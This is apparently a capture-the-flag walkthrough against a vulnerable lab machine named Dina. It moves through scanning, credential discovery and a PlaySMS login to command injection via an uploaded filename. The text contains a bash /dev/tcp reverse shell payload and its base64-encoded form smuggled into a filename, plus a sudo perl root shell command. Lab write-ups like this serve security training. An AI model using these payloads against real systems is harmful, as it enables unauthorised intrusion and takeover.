The IP of the target machine is found by using Netdiscover tool.
IP of the Machine is 192.168.1.165
Initial Analysis
First, Nmap scanner is used to find all the open ports and services running.
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
┌──(kali㉿kali)-[~] └─$ nmap -sV -p- -T4 -A 192.168.1.165 Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-05 01:47 EDT Nmap scan report for 192.168.1.165 Host is up (0.0026s latency). Not shown: 65534 closed ports PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.2.22 ((Ubuntu)) | http-robots.txt: 5 disallowed entries |_/ange1 /angel1 /nothing /tmp /uploads |_http-server-header: Apache/2.2.22 (Ubuntu) |_http-title: Dina
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 10.55 seconds
This scan reveals that there is only 1 open port which is port 80. Also an Apache server is hosted and this scan also reveals that there is a robots.txt file which disallows 5 directories.
When navigated to the page hosted by the Apache server:
This page revealed no important information. As there was a robots.txt file present, let’s try checking the disallowed directories.
While checking the nothing directory, the page contained no useful information.
When the page source was checked:
A bunch of passwords was revealed. These might be useful.
It’s time to do some more recon.
Nikto Web scanner is used here to scan for any possible vulnerabilities and information.
┌──(kali㉿kali)-[~] └─$ nikto -h 192.168.1.165 - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP: 192.168.1.165 + Target Hostname: 192.168.1.165 + Target Port: 80 + Start Time: 2021-08-05 01:50:30 (GMT-4) --------------------------------------------------------------------------- + Server: Apache/2.2.22 (Ubuntu) + Server may leak inodes via ETags, header found with file /, inode: 425463, size: 3618, mtime: Tue Oct 17 09:46:52 2017 + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + OSVDB-3268: /ange1/: Directory indexing found. + Entry '/ange1/'in robots.txt returned a non-forbidden or redirect HTTP code (200) + OSVDB-3268: /angel1/: Directory indexing found. + Entry '/angel1/'in robots.txt returned a non-forbidden or redirect HTTP code (200) + OSVDB-3268: /tmp/: Directory indexing found. + Entry '/tmp/'in robots.txt returned a non-forbidden or redirect HTTP code (200) + OSVDB-3268: /uploads/: Directory indexing found. + Entry '/uploads/'in robots.txt returned a non-forbidden or redirect HTTP code (200) + "robots.txt" contains 5 entries which should be manually viewed. + Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch. + Uncommon header 'tcn' found, with contents: list + Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for'index' were found: index.html + Allowed HTTP Methods: GET, HEAD, POST, OPTIONS + OSVDB-3268: /secure/: Directory indexing found. + OSVDB-3092: /tmp/: This might be interesting... + OSVDB-3233: /icons/README: Apache default file found. + 8730 requests: 0 error(s) and 20 item(s) reported on remote host + End Time: 2021-08-05 01:50:54 (GMT-4) (24 seconds) --------------------------------------------------------------------------- + 1 host(s) tested
This scan revealed that there was a directory secure which was not mentioned in the robots.txt file.
Now Dirb web content scanner is used to find some information about some hidden directories.
----------------- DIRB v2.22 By The Dark Raver -----------------
START_TIME: Thu Aug 5 01:52:25 2021 URL_BASE: http://192.168.1.165/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://192.168.1.165/ ---- + http://192.168.1.165/cgi-bin/ (CODE:403|SIZE:289) + http://192.168.1.165/index (CODE:200|SIZE:3618) + http://192.168.1.165/index.html (CODE:200|SIZE:3618) + http://192.168.1.165/robots (CODE:200|SIZE:102) + http://192.168.1.165/robots.txt (CODE:200|SIZE:102) ==> DIRECTORY: http://192.168.1.165/secure/ + http://192.168.1.165/server-status (CODE:403|SIZE:294) ==> DIRECTORY: http://192.168.1.165/tmp/ ==> DIRECTORY: http://192.168.1.165/uploads/ ---- Entering directory: http://192.168.1.165/secure/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w'if you want to scan it anyway) ---- Entering directory: http://192.168.1.165/tmp/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w'if you want to scan it anyway) ---- Entering directory: http://192.168.1.165/uploads/ ---- (!) WARNING: Directory IS LISTABLE. No need to scan it. (Use mode '-w'if you want to scan it anyway) ----------------- END_TIME: Thu Aug 5 01:52:29 2021 DOWNLOADED: 4612 - FOUND: 6
This scan also revealed that there is a directory secure which was already found by the nikto scan.
This directory might contain something useful. Time to check it out:
This directory contained a file backup.zip. When checking that out, it asked for a password.
When trying out the passwords which was found in the nothing directory, the password “freedom” worked. After extracting, a mp3 file was found. This might be a file that can contain some useful information. So it worked when trying to cat that file:
And that file contained a username and a hidden password. And also there was a URL mentioned. When checking that out:
That URL led to a web application named PlaySms. And it asked for login credentials. As there was a username “touhid” mentioned in the backup-cred.mp3 file, it might be worth trying that. But in order to find the password, the only source was from the bunch of passwords in the nothing directory. When trying that one by one, the password “diana” worked here.
This tells that when a php file with a filename is uploaded using sendfromfile option in the application, the filename gets executed. In order to check whether this exploits works, the filename which was given in the description is used. i.e. .php
And when uploaded:
Perfect! The script is getting executed. Now time to exploit this by uploading a reverse shell payload in the place of ‘uname -a’ in the filename.
The payload which is going to be used here is:
1
bash -i >& /dev/tcp/192.168.1.222/1234 0>&1
But in order to execute this, we have to upload it in the place of the filename. But a filename can’t contain slashes. So in order to bypass it, the payload should be encoded into base64 and uploaded. After that it should get decoded and executed.
The encoded payload: YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMjIyLzEyMzQgMD4mMQo=
And instead of that uname -a inside the single quotes, the payload below is placed to spawn a reverse tcp shell.
Before uploading the file, a netcat listener is started on port 1234 as mentioned in the payload. And then the file is uploaded which will spawn a reverse shell.
Privilege Escalation
Then the sudo permissions is checked using the command ‘sudo -l’
This shows that the perl commands can be run as root. So when it is used to create a shell with sudo command, a root shell will be spawned.
So for spawning a bash shell with perl the command below is used:
1
sudo /usr/bin/perl -e 'exec "/bin/bash";'
Finally, root shell is spawned. And the flag is found which is present in the /root directory.
